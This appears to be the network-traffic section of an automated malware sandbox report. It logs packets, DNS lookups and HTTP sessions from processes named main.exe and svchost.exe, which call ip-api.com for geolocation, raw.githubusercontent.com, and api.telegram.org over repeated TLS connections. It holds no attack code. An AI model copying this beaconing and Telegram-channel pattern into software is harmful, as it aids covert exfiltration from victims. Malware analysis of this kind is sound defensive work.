                                                                                        Jun 5, 2024 03:58:10.571855068 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:10.571942091 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:10.572045088 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:10.572457075 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:10.572570086 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.243607998 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:11.243637085 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.243693113 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:11.244035959 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:11.244044065 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.422818899 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.423973083 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:11.424020052 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.672352076 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.672532082 CEST44349839149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:11.672720909 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:11.672877073 CEST49839443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.087364912 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:12.088404894 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.088423014 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:12.337234974 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:12.337311029 CEST44349840149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:12.337481976 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.337701082 CEST49840443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.681021929 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.681107044 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:12.681199074 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.681646109 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:12.681726933 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.356055975 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.356142044 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.356403112 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.356564045 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.356604099 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.514976025 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.515093088 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.517139912 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.517196894 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.517719030 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.518714905 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.564502954 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.757471085 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.757555008 CEST44349841149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:13.757669926 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:13.758385897 CEST49841443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.197240114 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.197626114 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.271855116 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.271936893 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.272444963 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.273425102 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.320534945 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.522886992 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.522953987 CEST44349842149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.523149967 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.523468018 CEST49842443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.758965015 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.759000063 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:14.759076118 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.759232044 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:14.759243965 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.524755001 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:15.524838924 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.524938107 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:15.525273085 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:15.525355101 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.603852987 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.604819059 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:15.604835033 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.854418039 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.854500055 CEST44349843149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:15.854548931 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:15.854818106 CEST49843443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.365706921 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:16.368719101 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.368808031 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:16.614265919 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:16.614315987 CEST44349844149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:16.614573956 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.632769108 CEST49844443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.913312912 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.913348913 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:16.913399935 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.913599968 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:16.913609982 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:17.649544001 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:17.649579048 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:17.649656057 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:17.649913073 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:17.649924994 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:17.779386997 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:17.780657053 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:17.780677080 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.028290033 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.028433084 CEST44349845149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.028476000 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:18.028707981 CEST49845443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:18.492916107 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.494122028 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:18.494147062 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.743860960 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.743911982 CEST44349846149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:18.743956089 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:18.744431019 CEST49846443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.040716887 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.040806055 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.040929079 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.041456938 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.041538000 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.758949041 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.759032965 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.759128094 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.759550095 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.759639025 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.893076897 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.893455029 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.894423962 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.894479036 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.894999027 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:19.895982027 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:19.940574884 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.141197920 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.141357899 CEST44349847149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.141546965 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.141916037 CEST49847443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.603506088 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.603722095 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.605031967 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.605089903 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.605325937 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.606220961 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.648523092 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.852926970 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.852998972 CEST44349848149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:20.853085995 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:20.853504896 CEST49848443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.149574995 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.149604082 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:21.149669886 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.149945021 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.149951935 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:21.868221045 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.868252039 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:21.870079041 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:21.991667032 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:22.086693048 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:22.338624954 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:22.338644028 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:22.339941978 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:22.339951992 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:22.582519054 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:22.582695961 CEST44349849149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:22.582772017 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:22.583359003 CEST49849443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:22.619575024 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:58:22.961821079 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:58:23.189774990 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.189846992 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.193898916 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.193905115 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.194109917 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.197160959 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.244513988 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.447432041 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.447489977 CEST44349850149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.447695017 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.448009014 CEST49850443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.573811054 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:58:23.587028027 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.587112904 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:23.587207079 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.587584019 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:23.587671041 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.425429106 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.425535917 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.426564932 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.426597118 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.426944971 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.427748919 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.471345901 CEST49852443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.471375942 CEST44349852149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.471533060 CEST49852443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.471621990 CEST49852443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:24.471628904 CEST44349852149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.472569942 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.774228096 CEST4975080192.168.2.4208.95.112.1
                                                                                        Jun 5, 2024 03:58:24.871058941 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.871217966 CEST44349851149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:24.871298075 CEST49851443192.168.2.4149.154.167.220
                                                                                        Jun 5, 2024 03:58:25.315707922 CEST44349852149.154.167.220192.168.2.4
                                                                                        Jun 5, 2024 03:58:25.367966890 CEST49852443192.168.2.4149.154.167.220
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Jun 5, 2024 03:56:27.290996075 CEST6139753192.168.2.41.1.1.1
                                                                                        Jun 5, 2024 03:56:27.297962904 CEST53613971.1.1.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:28.961186886 CEST4980853192.168.2.41.1.1.1
                                                                                        Jun 5, 2024 03:56:28.970896006 CEST53498081.1.1.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:40.117446899 CEST6174753192.168.2.41.1.1.1
                                                                                        Jun 5, 2024 03:56:40.124118090 CEST53617471.1.1.1192.168.2.4
                                                                                        Jun 5, 2024 03:56:43.540545940 CEST5808753192.168.2.41.1.1.1
                                                                                        Jun 5, 2024 03:56:43.547657967 CEST53580871.1.1.1192.168.2.4
                                                                                        Jun 5, 2024 03:57:14.593348980 CEST6286453192.168.2.41.1.1.1
                                                                                        Jun 5, 2024 03:57:14.600795984 CEST53628641.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                        Jun 5, 2024 03:56:48.100300074 CEST192.168.2.4149.154.167.2204d59Echo
                                                                                        Jun 5, 2024 03:56:48.114694118 CEST149.154.167.220192.168.2.45559Echo Reply
                                                                                        Jun 5, 2024 03:57:03.589567900 CEST192.168.2.4149.154.167.2204d57Echo
                                                                                        Jun 5, 2024 03:57:03.602453947 CEST149.154.167.220192.168.2.45557Echo Reply
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Jun 5, 2024 03:56:27.290996075 CEST192.168.2.41.1.1.10x3221Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:28.961186886 CEST192.168.2.41.1.1.10x9e66Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:40.117446899 CEST192.168.2.41.1.1.10xa3aeStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:43.540545940 CEST192.168.2.41.1.1.10x5415Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:57:14.593348980 CEST192.168.2.41.1.1.10xec73Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Jun 5, 2024 03:55:57.967330933 CEST1.1.1.1192.168.2.40x5e4fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jun 5, 2024 03:55:57.967330933 CEST1.1.1.1192.168.2.40x5e4fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:27.297962904 CEST1.1.1.1192.168.2.40x3221No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:28.970896006 CEST1.1.1.1192.168.2.40x9e66No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:28.970896006 CEST1.1.1.1192.168.2.40x9e66No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:28.970896006 CEST1.1.1.1192.168.2.40x9e66No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:28.970896006 CEST1.1.1.1192.168.2.40x9e66No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:40.124118090 CEST1.1.1.1192.168.2.40xa3aeNo error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:56:43.547657967 CEST1.1.1.1192.168.2.40x5415No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        Jun 5, 2024 03:57:14.600795984 CEST1.1.1.1192.168.2.40xec73No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                        • raw.githubusercontent.com
                                                                                        • api.telegram.org
                                                                                        • ip-api.com
                                                                                        • www.google.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449745208.95.112.1805064C:\ProgramData\main.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:27.334147930 CEST65OUTGET /json/ HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Jun 5, 2024 03:56:27.933069944 CEST468INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:26 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Content-Length: 291
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 58 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 22 7a 69 70 22 3a 22 37 36 35 34 39 22 2c 22 6c 61 74 22 3a 33 31 2e 30 30 36 35 2c 22 6c 6f 6e 22 3a 2d 39 37 2e 38 34 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 51 75 61 64 72 61 4e 65 74 22 2c 22 6f 72 67 22 3a 22 4f 4d 47 49 54 53 46 41 53 54 22 2c 22 61 73 22 3a 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 7d
                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.91"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449748216.58.212.132805952C:\ProgramData\svchost.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jun 5, 2024 03:56:40.134970903 CEST149OUTGET / HTTP/1.1
                                                                                        Host: www.google.com
                                                                                        User-Agent: python-requests/2.28.1
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept: */*
                                                                                        Connection: keep-alive
                                                                                        Jun 5, 2024 03:56:41.030531883 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 05 Jun 2024 01:56:40 GMT
                                                                                        Expires: -1
                                                                                        Cache-Control: private, max-age=0
                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aiQhgy_sbOHoc9zCQcchNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Content-Encoding: gzip
                                                                                        Server: gws
                                                                                        Content-Length: 8471
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Set-Cookie: 1P_JAR=2024-06-05-01; expires=Fri, 05-Jul-2024 01:56:40 GMT; path=/; domain=.google.com; Secure
                                                                                        Set-Cookie: AEC=AQTF6Hzc44E2muI_JCMTesoFs_XrQMBQ4j4mMnT3QfBhwhghiDa3ob9UOeY; expires=Mon, 02-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                        Set-Cookie: NID=514=CbNGde4uPsMuHjhUahG7Gu93zHQxj5m4ogfTpQcwvgyV-QaM_8Jn4VY2LeLIWTl6oLCfc6EGVpX4T7p5p6K0OJL01GFc4o4ljhFfRKmg4I-BHiFnFTqVEEcJ0tDKCp3Xzs8YC4HjEGgip-MGRb_DAAOaRvTkeR9yBl7q4oppoG8; expires=Thu, 05-Dec-2024 01:56:40 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 02 ff cd 7c 69 77 db b8 d2 e6 f7 fc 0a 9a 99 ab 88 c7 b4 44 52 bb 64 da e3 38 ce d2 37 e9 a4 e3 f4 72 db ed f1 0b 92 90 c4 98 8b 4c 52 b6 15 5b ff 7d 9e 02 b8 49 56 ba fb ed 99 33 67 9c 58 22 80 02 50 1b 0a 55 05 d0 87 7b 5e ec 66 ab 05 57 e6 59 18 1c 1d d2 a7 e2 67 3c 4c dd 78 c1 6d 55 15 05 02 b0 d5
                                                                                        Data Ascii: |iwDRd87rLR[}IV3gX"PU{^fWYg<LxmU
                                                                                        Jun 5, 2024 03:56:41.030555010 CEST1236INData Raw: 79 96 2d c6 ed 76 ea ce 79 c8 5a 71 32 6b ff ca 9d 4f 6c c6 55 25 60 d1 cc 56 79 a4 62 04 ce bc a3 c3 90 67 4c 71 e3 28 e3 51 66 ab e7 9c 25 ee 5c c9 e6 5c b9 8b 93 c0 7b 91 2a 7e 34 8d 93 90 65 7e 1c e9 28 b8 c1 d2 f3 a3 99 72 c7 9d 05 46 4c 51
                                                                                        Data Ascii: y-vyZq2kOlU%`VybgLq(Qf%\\{*~4e~(rFLQ[qS8-MR%dJIYL9O,V<X(xL}r7gH5M,Zz<uA8$Dq-tMb''PYS~l}2D[v3AmWi
                                                                                        Jun 5, 2024 03:56:41.030571938 CEST424INData Raw: 2f df 8f 5f ac 7e e9 dd e3 f1 23 4c fd 70 34 1a 0c bb dd d1 7a b2 bd 59 b0 49 33 5a 06 81 6d 37 99 7d 87 5d 38 be 6b c9 ed 4b 3b 36 c6 ac 95 66 b7 a9 ab 1d cb aa 16 76 15 fb 6a 46 5f e3 0d 58 54 4e d6 5a cb 65 41 d0 cc e6 7e aa a1 d4 d4 36 e6 ca
                                                                                        Data Ascii: /_~#Lp4zYI3Zm7}]8kK;6fvjF_XTNZeA~6GH#{^<4chT4'~D{&]jLYOPEiKLXcN,eYTM4KN{|<>rIlT<_w
                                                                                        Jun 5, 2024 03:56:41.030631065 CEST1236INData Raw: 1a 8d b2 87 a8 52 f5 a2 11 70 ae ed 42 ed 49 ae 7b b6 5b 83 8c 17 be aa bb 9b 63 92 1e b8 b6 31 71 0f a7 ad 80 47 b3 6c 3e 71 f7 f7 b5 07 7f da 34 80 bb fb f8 68 1c ba 9a 47 14 aa 13 7c 4d 2f dc cb 0b e3 72 5f 05 b1 e2 d9 bc 5c 4b 8e ab 6d 75 bf
                                                                                        Data Ascii: RpBI{[c1qGl>q4hG|M/r_\Kmuyxte]UWonY.>Aw0Z=7R.WVTk+`' \jhpM{`vwVfEKME y8xz<Wcsl
                                                                                        Jun 5, 2024 03:56:41.030833960 CEST1236INData Raw: a0 8e e2 32 09 9a 45 ee 35 62 b7 57 70 c3 62 cb 1a 51 5a 55 83 d4 0f ac 3e d9 b0 84 2f 38 cb 0e ee 6b 22 2c 88 22 49 4d dc 65 92 a2 7e 11 fb 51 c6 93 3a c6 93 6a 11 2e 33 c2 0a 4f 52 3d 7b 3b d4 73 97 b9 22 8c 0b 05 a8 f3 56 72 47 2c 9a f1 14 db
